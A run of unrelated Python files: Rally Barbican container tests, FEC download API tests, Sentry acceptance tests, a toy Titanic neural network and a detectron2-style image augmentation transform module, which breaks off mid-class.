context = super(BarbicanContainersTestCase, self).get_test_context()
context.update({
"admin": {
"user_id": "fake",
"credential": mock.MagicMock()
},
"user": {
"user_id": "fake",
"credential": mock.MagicMock()
},
"tenant": {"id": "fake"}
})
return context
def setUp(self):
super(BarbicanContainersTestCase, self).setUp()
patch = mock.patch(
"rally_openstack.services.key_manager.barbican.BarbicanService")
self.addCleanup(patch.stop)
self.mock_secrets = patch.start()
def test_list_containers(self):
secrets_service = self.mock_secrets.return_value
scenario = containers.BarbicanContainersList(self.context)
scenario.run()
secrets_service.list_container.assert_called_once_with()
def test_generic_container_create_and_delete(self):
secrets_service = self.mock_secrets.return_value
fake_container = {"container_ref": "fake_container_ref"}
fake_container = secrets_service.container_create.return_value
scenario = containers.BarbicanContainersGenericCreateAndDelete(
self.context)
scenario.run()
secrets_service.container_create.assert_called_once_with()
secrets_service.container_delete.assert_called_once_with(
fake_container.container_ref)
def test_generic_container_create_and_add_secret(self):
secrets_service = self.mock_secrets.return_value
fake_container = {"container_ref": "fake_container_ref"}
fake_secrets = {"secret_ref": "fake_secret_ref"}
fake_container = secrets_service.container_create.return_value
fake_secrets = secrets_service.create_secret.return_value
scenario = containers.BarbicanContainersGenericCreateAndAddSecret(
self.context)
scenario.run()
secrets_service.create_secret.assert_called_once_with()
secrets_service.container_create.assert_called_once_with(
secrets={"secret": fake_secrets})
secrets_service.container_delete.assert_called_once_with(
fake_container.container_ref)
    def test_certificate_container_create_and_delete(self):
secrets_service = self.mock_secrets.return_value
fake_container = {"container_ref": "fake_container_ref"}
fake_container = secrets_service.create_certificate_container \
.return_value
scenario = containers.BarbicanContainersCertificateCreateAndDelete(
self.context)
scenario.run()
secrets_service.create_certificate_container.assert_called_once_with()
secrets_service.container_delete.assert_called_once_with(
fake_container.container_ref)
def test_rsa_container_create_and_delete(self):
secrets_service = self.mock_secrets.return_value
fake_container = {"container_ref": "fake_container_ref"}
fake_container = secrets_service.create_rsa_container.return_value
scenario = containers.BarbicanContainersRSACreateAndDelete(
self.context)
scenario.run()
secrets_service.create_rsa_container.assert_called_once_with()
secrets_service.container_delete.assert_called_once_with(
fake_container.container_ref)
|
"""
Module containing common generator constants
"""
LOGGER_NAME = "logger"
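# Minimal usage sketch: generator modules are assumed to share this logger name,
# e.g. logging.getLogger(LOGGER_NAME).info("generating ...").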
|
from rjgtoys.yaml import yaml_load
data = yaml_load("""
---
a: 1
b: 2
""")
print(data)
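# Expected to print a mapping equivalent to {'a': 1, 'b': 2}; the exact type and repr
# depend on rjgtoys.yaml's loader.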
|
import mock
import hashlib
import pytest
from botocore.exceptions import ClientError
from webservices.rest import db, api
from webservices.tasks import download as tasks
from webservices.resources import download as resource
from tests import factories
from tests.common import ApiBaseTest
class TestDownloadTask(ApiBaseTest):
def test_get_filename(self):
path = '/v1/candidates/'
qs = '?office=H&sort=name'
expected = hashlib.sha224((path + qs).encode('utf-8')).hexdigest() + '.zip'
assert tasks.get_s3_name(path, qs) == expected
def test_download_url(self):
obj = mock.Mock()
obj.key = 'key'
obj.bucket = 'bucket'
obj.meta.client.generate_presigned_url.return_value = '/download'
url = resource.get_download_url(obj)
assert url == '/download'
        obj.meta.client.generate_presigned_url.assert_called_once_with(
            'get_object',
            Params={'Key': 'key', 'Bucket': 'bucket'},
            ExpiresIn=resource.URL_EXPIRY,
        )
def test_download_url_filename(self):
obj = mock.Mock()
obj.key = 'key'
obj.bucket = 'bucket'
resource.get_download_url(obj, filename='data.zip')
        obj.meta.client.generate_presigned_url.assert_called_once_with(
            'get_object',
            Params={
                'Key': 'key',
                'Bucket': 'bucket',
                'ResponseContentDisposition': 'filename=data.zip',
            },
            ExpiresIn=resource.URL_EXPIRY,
        )
@mock.patch('webservices.tasks.download.upload_s3')
def test_views(self, upload_s3):
for view in tasks.RESOURCE_WHITELIST:
url = api.url_for(view)
tasks.export_query(url, b'')
class TestDownloadResource(ApiBaseTest):
@mock.patch('webservices.resources.download.get_cached_file')
@mock.patch('webservices.resources.download.download.export_query')
def test_download(self, export, get_cached):
get_cached.return_value = None
res = self.client.post_json(api.url_for(resource.DownloadView, path='candidates', office='S'))
assert res.json == {'status': 'queued'}
get_cached.assert_called_once_with('/v1/candidates/', b'office=S', filename=None)
export.delay.assert_called_once_with('/v1/candidates/', b'office=S')
@mock.patch('webservices.resources.download.get_cached_file')
@mock.patch('webservices.resources.download.download.export_query')
def test_download_cached(self, export, get_cached):
get_cached.return_value = '/download'
res = self.client.post_json(api.url_for(resource.DownloadView, path='candidates', office='S'))
assert res.json == {'status': 'complete', 'url': '/download'}
assert not export.delay.called
def test_download_forbidden(self):
with pytest.raises(ValueError):
self.client.post_json(api.url_for(resource.DownloadView, path='elections'))
@mock.patch('webservices.resources.download.MAX_RECORDS', 2)
@mock.patch('webservices.resources.download.get_cached_file')
@mock.patch('webservices.resources.download.download.export_query')
def test_download_too_big(self, export, get_cached):
get_cached.return_value = None
[factories.CandidateFactory() for _ in range(5)]
db.session.commit()
res = self.client.post_json(
api.url_for(resource.DownloadView, path='candidates'),
expect_errors=True,
)
assert res.status_code == 403
assert not export.delay.called
@mock.patch('webservices.resources.download.get_download_url')
@mock.patch('webservices.tasks.utils.get_object')
def test_get_cached_exists(self, get_object, get_download):
mock_object = mock.Mock()
get_object.return_value = mock_object
get_download.return_value = '/download'
res = resource.get_cached_file('/candidate', b'', filename='download.csv')
assert res == '/download'
get_download.assert_called_once_with(mock_object, filename='download.csv')
@mock.patch('webservices.tasks.utils.get_object')
def test_get_cached_not_exists(self, get_object):
mock_object = mock.Mock()
def get_metadata():
raise ClientError({'Error': {}}, 'test')
mock_metadata = mock.PropertyMock(side_effect=get_metadata)
type(mock_object).metadata = mock_metadata
get_object.return_value = mock_object
res = resource.get_cached_file('/candidate', b'')
assert res is None
|
"""
Run all the unit tests in the cea/tests folder
"""
import os
import unittest
import cea.config
import cea.workflows.workflow
__author__ = "Daren Thomas"
__copyright__ = "Copyright 2020, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Daren Thomas"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "cea@arch.ethz.ch"
__status__ = "Production"
def main(_):
test_suite = unittest.defaultTestLoader.discover(os.path.dirname(__file__))
result = unittest.TextTestRunner(verbosity=1).run(test_suite)
if not result.wasSuccessful():
raise AssertionError("Unittests failed.")
if __name__ == "__main__":
main(cea.config.Configuration)
|
from __future__ import absolute_import
import pytz
from datetime import datetime, timedelta
from django.utils import timezone
from sentry.testutils import AcceptanceTestCase, SnubaTestCase
from mock import patch
event_time = (datetime.utcnow() - timedelta(days=3)).replace(tzinfo=pytz.utc)
class OrganizationGroupIndexTest(AcceptanceTestCase, SnubaTestCase):
def setUp(self):
super(OrganizationGroupIndexTest, self).setUp()
self.user = self.create_user('foo@example.com')
self.org = self.create_organization(owner=self.user, name='Rowdy Tiger')
self.team = self.create_team(
organization=self.org,
name='Mariachi Band',
members=[self.user])
self.project = self.create_project(
organization=self.org,
teams=[self.team],
name='Bengal',
)
self.other_project = self.create_project(
organization=self.org,
teams=[self.team],
name='Sumatra',
)
self.login_as(self.user)
self.path = u'/organizations/{}/issues/'.format(self.org.slug)
def test_with_onboarding(self):
self.project.update(first_event=None)
self.browser.get(self.path)
self.wait_until_loaded()
self.browser.wait_until_test_id('awaiting-events')
self.browser.snapshot('organization issues onboarding')
def test_with_no_results(self):
self.project.update(first_event=timezone.now())
self.browser.get(self.path)
self.wait_until_loaded()
self.browser.wait_until_test_id('empty-state')
self.browser.snapshot('organization issues no results')
@patch('django.utils.timezone.now')
def test_with_results(self, mock_now):
mock_now.return_value = datetime.utcnow().replace(tzinfo=pytz.utc)
self.store_event(
data={
'event_id': 'a' * 32,
'message': 'oh no',
'timestamp': event_time.isoformat()[:19],
'fingerprint': ['group-1']
},
project_id=self.project.id
)
self.store_event(
data={
'event_id': 'b' * 32,
'message': 'oh snap',
'timestamp': event_time.isoformat()[:19],
'fingerprint': ['group-2']
},
project_id=self.project.id
)
self.browser.get(self.path)
self.wait_until_loaded()
self.browser.wait_until('.event-issue-header')
self.browser.snapshot('organization issues with issues')
groups = self.browser.find_elements_by_class_name('event-issue-header')
assert len(groups) == 2
assert 'oh snap' in groups[0].text
assert 'oh no' in groups[1].text
def wait_until_loaded(self):
self.browser.wait_until_not('.loading')
|
from DataPreparation import DataPreparation
import numpy as np
from scipy.special import expit
class ANN:
def __init__(self):
self.neuralNetwork = NeuralNetwork()
def trainNetwork(self, numberOfIteration):
dataPreparation = DataPreparation()
# testData = dataPreparation.prepareTestData()
trainData = dataPreparation.prepareTrainData()
trainingInputs = trainData.drop("Survived", axis=1).to_numpy(int)
trainingOutputs = trainData["Survived"].to_numpy(int)
trainingOutputs = trainingOutputs.reshape(1, trainingOutputs.size).T
trainingInputs = np.array(trainingInputs, dtype=np.float128)
trainingOutputs = np.array(trainingOutputs, dtype=np.float128)
# print(trainingInputs)
# print(trainingOutputs)
self.neuralNetwork.train(trainingInputs, trainingOutputs, numberOfIteration)
def accuracy(self):
dataPreparation = DataPreparation()
testData = dataPreparation.prepareTestData().to_numpy(int)
testOutput = dataPreparation.prepareSubmissionData().to_numpy(int)
testOutput = testOutput.reshape(testOutput.size, 1)
# print(testData)
# print(testOutput)
calculated = self.neuralNetwork.think(testData)
accuracy = (testOutput.size - np.sum(np.abs(testOutput - calculated)))/testOutput.size
accuracy = accuracy * 10000
accuracy = np.array(accuracy, dtype=int)
accuracy = accuracy/100
return accuracy
#
# def accuracy(self, testInput, testOutput):
# calculated = self.neuralNetwork.think(testInput)
# calculated = self.neuralNetwork.think(testInput)
# # return np.sum(accuracy)
class NeuralNetwork():
def __init__(self):
# Seed the random number generator
np.random.seed(1)
# Set synaptic weights to a 3x1 matrix,
# with values from -1 to 1 and mean 0
self.synaptic_weights = 2 * np.random.random((7, 1)) - 1
def sigmoid(self, x):
"""
Takes in weighted sum of the inputs and normalizes
them through between 0 and 1 through a sigmoid function
"""
# return 1 / (1 + np.exp(-x))
return expit(x)
def sigmoid_derivative(self, x):
"""
The derivative of the sigmoid function used to
calculate necessary weight adjustments
"""
return x * (1 - x)
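    # Note: train() passes the sigmoid *output* into this function, so x * (1 - x)
    # is the derivative of the sigmoid evaluated at that output, i.e. s(z) * (1 - s(z)).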
def train(self, training_inputs, training_outputs, training_iterations):
# print('testy')
# print(self.synaptic_weights.shape)
# print(training_inputs.shape)
# print(training_outputs.reshape(training_outputs.size, 1))
"""
We train the model through trial and error, adjusting the
synaptic weights each time to get a better result
"""
for iteration in range(training_iterations):
# print(iteration)
# Pass training set through the neural network
output = self.think(training_inputs)
# Calculate the error rate
error = training_outputs - output
# Multiply error by input and gradient of the sigmoid function
# Less confident weights are adjusted more through the nature of the function
adjustments = np.dot(training_inputs.T, error * self.sigmoid_derivative(output))
# Adjust synaptic weights
self.synaptic_weights += adjustments
def think(self, inputs):
"""
Pass inputs through the neural network to get output
"""
inputs = inputs.astype(float)
output = self.sigmoid(np.dot(inputs, self.synaptic_weights))
return output
if __name__ == "__main__":
ann = ANN()
# ann.trainNetwork(10000)
ann.trainNetwork(10000)
ann.accuracy()
# print('wynikkk')
print(ann.neuralNetwork.think(np.array([1, 3, 0, 22, 1, 0, 7])))
print(ann.neuralNetwork.think(np.array([2, 1, 1, 38, 1, 0, 71])))
print(ann.neuralNetwork.think(np.array([3, 3, 1, 26, 0, 0, 7])))
# ann.calculateAccuracy()
# print(ann.calculateAccuracy())
# if __name__ == "__main__":
# # Initialize the single neuron neural network
# neural_network = NeuralNetwork()
#
# print("Random starting synaptic weights: ")
# print(neural_network.synaptic_weights)
#
# # The training set, with 4 examples consisting of 3
# # input values and 1 output value
# training_inputs = np.array([[0, 0, 1],
# [1, 1, 1],
# [1, 0, 1],
# [0, 1, 1]])
# # dataPreparation = DataPreparation()
# # trainingInput = dataPreparation.prepareTrainData()
#
# training_outputs = np.array([[0, 1, 1, 0]]).T
#
# # Train the neural network
# neural_network.train(training_inputs, training_outputs, 10000)
#
# print("Synaptic weights after training: ")
# print(neural_network.synaptic_weights)
#
# A = str(input("Input 1: "))
# B = str(input("Input 2: "))
# C = str(input("Input 3: "))
#
# print("New situation: input data = ", A, B, C)
# print("Output data: ")
# print(neural_network.think(np.array([A, B, C])))
|
# -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# File: transform.py
import inspect
import pprint
from typing import Callable, List, TypeVar
from fvcore.transforms.transform import Transform
from fvcore.transforms.transform_util import to_float_tensor, to_numpy
import numpy as np
import random
import torch
import torch.nn.functional as F
from PIL import Image, ImageOps, ImageFilter
from detectron2.data.detection_utils import fill_region, compute_crop_box_iou
try:
import cv2 # noqa
except ImportError:
# OpenCV is an optional dependency at the moment
pass
__all__ = [
"ExtentTransform",
"ResizeTransform",
"RotationTransform",
"ColorTransform",
"PILColorTransform",
"CropTransform",
"BlendTransform",
"VFlipTransform",
"HFlipTransform",
"NoOpTransform",
"TransformList",
"ScaleTransform",
"GridSampleTransform",
"EdgeFilterTransform",
"BoxShearTransform",
"BoxContrastTransform",
"NoiseTransform",
"BoxEraseTransform",
"MosaicTransform",
"BoxMoveTransform",
]
class WrapTransform(Transform):
"""Re-implement the Transform class, because it is a python pack, I can't add new func to it.
Just add some custom func to Transform, and all the child transform classes will be a subclass of this
"""
def apply_annotations(self, annotations):
"""
For most transform methods, num of annos won't be changed, only the box coor will change.
Thus, if num of annos changes, re-write this func.
"""
boxes = np.array([anno["bbox"] for anno in annotations])
boxes = self.apply_box(boxes).tolist()
for i,box in enumerate(boxes):
annotations[i]["bbox"] = box
        annotations = [
            anno for anno in annotations
            if int(anno["bbox"][0]) < int(anno["bbox"][2])
            and int(anno["bbox"][1]) < int(anno["bbox"][3])
        ]
return annotations
_T = TypeVar("_T")
# pyre-ignore-all-errors
class TransformList(WrapTransform):
"""
Maintain a list of transform operations which will be applied in sequence.
Attributes:
transforms (list[Transform])
"""
def __init__(self, transforms: List[Transform]):
"""
Args:
transforms (list[Transform]): list of transforms to perform.
"""
super().__init__()
# "Flatten" the list so that TransformList do not recursively contain TransfomList.
# The additional hierarchy does not change semantic of the class, but cause extra
# complexities in e.g, telling whether a TransformList contains certain Transform
tfms_flatten = []
for t in transforms:
assert isinstance(
t, Transform
), f"TransformList requires a list of Transform. Got type {type(t)}!"
if isinstance(t, TransformList):
tfms_flatten.extend(t.transforms)
else:
tfms_flatten.append(t)
self.transforms = tfms_flatten
def _apply(self, x: _T, meth: str) -> _T:
"""
Apply the transforms on the input.
Args:
x: input to apply the transform operations.
            meth (str): name of the ``apply_*`` method to call on each transform.
        Returns:
            x: the input after all transforms have been applied.
"""
for t in self.transforms:
x = getattr(t, meth)(x)
return x
def __getattribute__(self, name: str):
# use __getattribute__ to win priority over any registered dtypes
if name.startswith("apply_"):
return lambda x: self._apply(x, name)
return super().__getattribute__(name)
def __add__(self, other: "TransformList") -> "TransformList":
"""
Args:
other (TransformList): transformation to add.
Returns:
TransformList: list of transforms.
"""
others = other.transforms if isinstance(other, TransformList) else [other]
return TransformList(self.transforms + others)
def __iadd__(self, other: "TransformList") -> "TransformList":
"""
Args:
other (TransformList): transformation to add.
Returns:
TransformList: list of transforms.
"""
others = other.transforms if isinstance(other, TransformList) else [other]
self.transforms.extend(others)
return self
def __radd__(self, other: "TransformList") -> "TransformList":
"""
Args:
other (TransformList): transformation to add.
Returns:
TransformList: list of transforms.
"""
others = other.transforms if isinstance(other, TransformList) else [other]
return TransformList(others + self.transforms)
def __len__(self) -> int:
"""
Returns:
Number of transforms contained in the TransformList.
"""
return len(self.transforms)
def __getitem__(self, idx) -> Transform:
return self.transforms[idx]
def inverse(self) -> "TransformList":
"""
Invert each transform in reversed order.
"""
return TransformList([x.inverse() for x in self.transforms[::-1]])
def __repr__(self) -> str:
msgs = [str(t) for t in self.transforms]
return "TransformList[{}]".format(", ".join(msgs))
__str__ = __repr__
# The actual implementations are provided in __getattribute__.
# But abstract methods need to be declared here.
def apply_coords(self, x):
raise NotImplementedError
def apply_image(self, x):
raise NotImplementedError
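# A minimal sketch (shapes and values illustrative) of the __getattribute__ dispatch
# above: any ``apply_*`` call on a TransformList is routed through _apply(), which
# chains the member transforms in order.
#
#     tfl = TransformList([HFlipTransform(width=640), VFlipTransform(height=480)])
#     out = tfl.apply_image(np.zeros((480, 640, 3), dtype=np.uint8))
#     pts = tfl.apply_coords(np.array([[10.0, 20.0]]))  # -> [[630.0, 460.0]]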
class HFlipTransform(WrapTransform):
"""
Perform horizontal flip.
"""
def __init__(self, width: int):
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray) -> np.ndarray:
"""
Flip the image(s).
Args:
img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
Returns:
ndarray: the flipped image(s).
"""
# NOTE: opencv would be faster:
# https://github.com/pytorch/pytorch/issues/16424#issuecomment-580695672
if img.ndim <= 3: # HxW, HxWxC
return np.flip(img, axis=1)
else:
return np.flip(img, axis=-2)
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Flip the coordinates.
Args:
coords (ndarray): floating point array of shape Nx2. Each row is
(x, y).
Returns:
ndarray: the flipped coordinates.
Note:
The inputs are floating point coordinates, not pixel indices.
Therefore they are flipped by `(W - x, H - y)`, not
`(W - 1 - x, H - 1 - y)`.
"""
coords[:, 0] = self.width - coords[:, 0]
return coords
def inverse(self) -> Transform:
"""
The inverse is to flip again
"""
return self
class VFlipTransform(WrapTransform):
"""
Perform vertical flip.
"""
def __init__(self, height: int):
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray) -> np.ndarray:
"""
Flip the image(s).
Args:
img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
Returns:
ndarray: the flipped image(s).
"""
tensor = torch.from_numpy(np.ascontiguousarray(img))
if len(tensor.shape) == 2:
# For dimension of HxW.
tensor = tensor.flip((-2))
elif len(tensor.shape) > 2:
# For dimension of HxWxC, NxHxWxC.
tensor = tensor.flip((-3))
return tensor.numpy()
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Flip the coordinates.
Args:
coords (ndarray): floating point array of shape Nx2. Each row is
(x, y).
Returns:
ndarray: the flipped coordinates.
Note:
The inputs are floating point coordinates, not pixel indices.
Therefore they are flipped by `(W - x, H - y)`, not
`(W - 1 - x, H - 1 - y)`.
"""
coords[:, 1] = self.height - coords[:, 1]
return coords
def inverse(self) -> Transform:
"""
The inverse is to flip again
"""
return self
class NoOpTransform(WrapTransform):
"""
A transform that does nothing.
"""
def __init__(self):
super().__init__()
def apply_image(self, img: np.ndarray) -> np.ndarray:
return img
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
return coords
def inverse(self) -> Transform:
return self
def __getattr__(self, name: str):
if name.startswith("apply_"):
return lambda x: x
raise AttributeError("NoOpTransform object has no attribute {}".format(name))
class ScaleTransform(WrapTransform):
"""
Resize the image to a target size.
"""
def __init__(self, h: int, w: int, new_h: int, new_w: int, interp: str = None):
"""
Args:
h, w (int): original image size.
new_h, new_w (int): new image size.
interp (str): interpolation methods. Options includes `nearest`, `linear`
(3D-only), `bilinear`, `bicubic` (4D-only), and `area`.
Details can be found in:
https://pytorch.org/docs/stable/nn.functional.html
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:
"""
Resize the image(s).
Args:
img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
interp (str): interpolation methods. Options includes `nearest`, `linear`
(3D-only), `bilinear`, `bicubic` (4D-only), and `area`.
Details can be found in:
https://pytorch.org/docs/stable/nn.functional.html
Returns:
ndarray: resized image(s).
"""
if len(img.shape) == 4:
h, w = img.shape[1:3]
elif len(img.shape) in (2, 3):
h, w = img.shape[:2]
else:
raise ("Unsupported input with shape of {}".format(img.shape))
assert (
self.h == h and self.w == w
), "Input size mismatch h w {}:{} -> {}:{}".format(self.h, self.w, h, w)
interp_method = interp if interp is not None else self.interp
# Option of align_corners is only supported for linear, bilinear,
# and bicubic.
if interp_method in ["linear", "bilinear", "bicubic"]:
align_corners = False
else:
align_corners = None
# note: this is quite slow for int8 images because torch does not
# support it https://github.com/pytorch/pytorch/issues/5580
float_tensor = torch.nn.functional.interpolate(
to_float_tensor(img),
size=(self.new_h, self.new_w),
mode=interp_method,
align_corners=align_corners,
)
return to_numpy(float_tensor, img.shape, img.dtype)
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Compute the coordinates after resize.
Args:
coords (ndarray): floating point array of shape Nx2. Each row is
(x, y).
Returns:
ndarray: resized coordinates.
"""
coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)
coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)
return coords
def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:
"""
Apply resize on the full-image segmentation.
Args:
segmentation (ndarray): of shape HxW. The array should have integer
or bool dtype.
Returns:
ndarray: resized segmentation.
"""
segmentation = self.apply_image(segmentation, interp="nearest")
return segmentation
def inverse(self) -> Transform:
"""
The inverse is to resize it back.
"""
return ScaleTransform(self.new_h, self.new_w, self.h, self.w, self.interp)
class GridSampleTransform(WrapTransform):
def __init__(self, grid: np.ndarray, interp: str):
"""
Args:
grid (ndarray): grid has x and y input pixel locations which are
used to compute output. Grid has values in the range of [-1, 1],
which is normalized by the input height and width. The dimension
is `N x H x W x 2`.
interp (str): interpolation methods. Options include `nearest` and
`bilinear`.
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:
"""
Apply grid sampling on the image(s).
Args:
img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
interp (str): interpolation methods. Options include `nearest` and
`bilinear`.
Returns:
ndarray: grid sampled image(s).
"""
interp_method = interp if interp is not None else self.interp
float_tensor = torch.nn.functional.grid_sample(
to_float_tensor(img), # NxHxWxC -> NxCxHxW.
torch.from_numpy(self.grid),
mode=interp_method,
padding_mode="border",
align_corners=False,
)
return to_numpy(float_tensor, img.shape, img.dtype)
def apply_coords(self, coords: np.ndarray):
"""
Not supported.
"""
raise NotImplementedError()
def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:
"""
Apply grid sampling on the full-image segmentation.
Args:
segmentation (ndarray): of shape HxW. The array should have integer
or bool dtype.
Returns:
ndarray: grid sampled segmentation.
"""
segmentation = self.apply_image(segmentation, interp="nearest")
return segmentation
class CropTransform(WrapTransform):
    def __init__(self, x0: int, y0: int, w: int, h: int, min_area_rate: float = 0.0):
# TODO: flip the order of w and h.
"""
Args:
x0, y0, w, h (int): crop the image(s) by img[y0:y0+h, x0:x0+w].
            min_area_rate: drop a cropped box when its remaining area / original area < min_area_rate
                (defaults to 0.0, i.e. keep any box that still overlaps the crop).
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray) -> np.ndarray:
"""
Crop the image(s).
Args:
img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
Returns:
ndarray: cropped image(s).
"""
if len(img.shape) <= 3:
return img[self.y0 : self.y0 + self.h, self.x0 : self.x0 + self.w]
else:
return img[..., self.y0 : self.y0 + self.h, self.x0 : self.x0 + self.w, :]
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Apply crop transform on coordinates.
Args:
coords (ndarray): floating point array of shape Nx2. Each row is
(x, y).
Returns:
ndarray: cropped coordinates.
"""
coords[:, 0] -= self.x0
coords[:, 1] -= self.y0
return coords
def apply_annotations(self, annotations):
#raw box area
boxes = np.array([anno["bbox"] for anno in annotations])
        if boxes.ndim == 1:
            boxes = boxes.reshape(-1, 4)
        raw_area = (boxes[:,2]-boxes[:,0]) * (boxes[:,3]-boxes[:,1])
#compute iou mask
crop_box = np.array([self.x0, self.y0, self.x0+self.w, self.y0+self.h])
iou = compute_crop_box_iou(boxes, crop_box)
mask = iou > 0
boxes = boxes[mask]
raw_area = raw_area[mask]
#remove some annos
annotations = [annotations[i] for i in range(len(annotations)) if mask[i]]
#for iou>0, compute inter boxes
crop_box = np.tile(crop_box, (boxes.shape[0], 1))
inter_boxes = np.zeros_like(boxes)
inter_boxes[:,0] = np.maximum(boxes[:,0], crop_box[:,0])
inter_boxes[:,1] = np.maximum(boxes[:,1], crop_box[:,1])
inter_boxes[:,2] = np.minimum(boxes[:,2], crop_box[:,2])
inter_boxes[:,3] = np.minimum(boxes[:,3], crop_box[:,3])
#cvt inter boxes' coors to crop img
inter_boxes[:,0] = inter_boxes[:,0] - crop_box[:,0]
inter_boxes[:,1] = inter_boxes[:,1] - crop_box[:,1]
inter_boxes[:,2] = inter_boxes[:,2] - crop_box[:,0]
inter_boxes[:,3] = inter_boxes[:,3] - crop_box[:,1]
#box area on crop img
new_area = (inter_boxes[:,2]-inter_boxes[:,0]) * (inter_boxes[:,3]-inter_boxes[:,1])
crop_box_area = self.w * self.h
mask = (new_area/raw_area > self.min_area_rate) & (abs(new_area - crop_box_area) > 5)
#find boxes whose new_area==crop_box_area
area_idx = []
for i, area in enumerate(new_area):
if abs(area - crop_box_area) < 0.01:
area_idx.append(i)
#only retain the smallest one
smallest = 10000000
smallest_idx = -1
for idx in area_idx:
if smallest > raw_area[idx]:
smallest = raw_area[idx]
smallest_idx = idx
for idx in area_idx:
if not idx==smallest_idx:
mask[idx] = False
inter_boxes = inter_boxes[mask]
#remove some annos
annotations = [annotations[i] for i in range(len(annotations)) if mask[i]]
#update coor
for i in range(len(annotations)):
annotations[i]["bbox"] = inter_boxes[i]
return annotations
def apply_polygons(self, polygons: list) -> list:
"""
Apply crop transform on a list of polygons, each represented by a Nx2 array.
It will crop the polygon with the box, therefore the number of points in the
polygon might change.
Args:
polygon (list[ndarray]): each is a Nx2 floating point array of
(x, y) format in absolute coordinates.
Returns:
ndarray: cropped polygons.
"""
import shapely.geometry as geometry
# Create a window that will be used to crop
crop_box = geometry.box(
self.x0, self.y0, self.x0 + self.w, self.y0 + self.h
).buffer(0.0)
cropped_polygons = []
for polygon in polygons:
polygon = geometry.Polygon(polygon).buffer(0.0)
# polygon must be valid to perform intersection.
assert polygon.is_valid, polygon
cropped = polygon.intersection(crop_box)
if cropped.is_empty:
continue
if not isinstance(cropped, geometry.collection.BaseMultipartGeometry):
cropped = [cropped]
# one polygon may be cropped to multiple ones
for poly in cropped:
# It could produce lower dimensional objects like lines or
# points, which we want to ignore
if not isinstance(poly, geometry.Polygon) or not poly.is_valid:
continue
coords = np.asarray(poly.exterior.coords)
# NOTE This process will produce an extra identical vertex at
# the end. So we remove it. This is tested by
# `tests/test_data_transform.py`
cropped_polygons.append(coords[:-1])
return [self.apply_coords(p) for p in cropped_polygons]
class BlendTransform(WrapTransform):
"""
Transforms pixel colors with PIL enhance functions.
"""
def __init__(self, src_image: np.ndarray, src_weight: float, dst_weight: float):
"""
Blends the input image (dst_image) with the src_image using formula:
``src_weight * src_image + dst_weight * dst_image``
Args:
src_image (ndarray): Input image is blended with this image
src_weight (float): Blend weighting of src_image
dst_weight (float): Blend weighting of dst_image
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:
"""
Apply blend transform on the image(s).
Args:
img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
interp (str): keep this option for consistency, perform blend would not
require interpolation.
Returns:
ndarray: blended image(s).
"""
if img.dtype == np.uint8:
img = img.astype(np.float32)
img = self.src_weight * self.src_image + self.dst_weight * img
return np.clip(img, 0, 255).astype(np.uint8)
else:
return self.src_weight * self.src_image + self.dst_weight * img
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Apply no transform on the coordinates.
"""
return coords
def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:
"""
Apply no transform on the full-image segmentation.
"""
return segmentation
def inverse(self) -> Transform:
"""
The inverse is a no-op.
"""
return NoOpTransform()
class ExtentTransform(WrapTransform):
"""
Extracts a subregion from the source image and scales it to the output size.
The fill color is used to map pixels from the source rect that fall outside
the source image.
See: https://pillow.readthedocs.io/en/latest/PIL.html#PIL.ImageTransform.ExtentTransform
"""
def __init__(self, src_rect, output_size, interp=Image.LINEAR, fill=0):
"""
Args:
src_rect (x0, y0, x1, y1): src coordinates
output_size (h, w): dst image size
interp: PIL interpolation methods
fill: Fill color used when src_rect extends outside image
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img, interp=None):
h, w = self.output_size
ret = Image.fromarray(img).transform(
size=(w, h),
method=Image.EXTENT,
data=self.src_rect,
resample=interp if interp else self.interp,
fill=self.fill,
)
return np.asarray(ret)
def apply_coords(self, coords):
# Transform image center from source coordinates into output coordinates
# and then map the new origin to the corner of the output image.
h, w = self.output_size
x0, y0, x1, y1 = self.src_rect
new_coords = coords.astype(np.float32)
new_coords[:, 0] -= 0.5 * (x0 + x1)
new_coords[:, 1] -= 0.5 * (y0 + y1)
new_coords[:, 0] *= w / (x1 - x0)
new_coords[:, 1] *= h / (y1 - y0)
new_coords[:, 0] += 0.5 * w
new_coords[:, 1] += 0.5 * h
return new_coords
def apply_segmentation(self, segmentation):
segmentation = self.apply_image(segmentation, interp=Image.NEAREST)
return segmentation
class ResizeTransform(WrapTransform):
"""
Resize the image to a target size.
"""
def __init__(self, h, w, new_h, new_w, interp=None):
"""
Args:
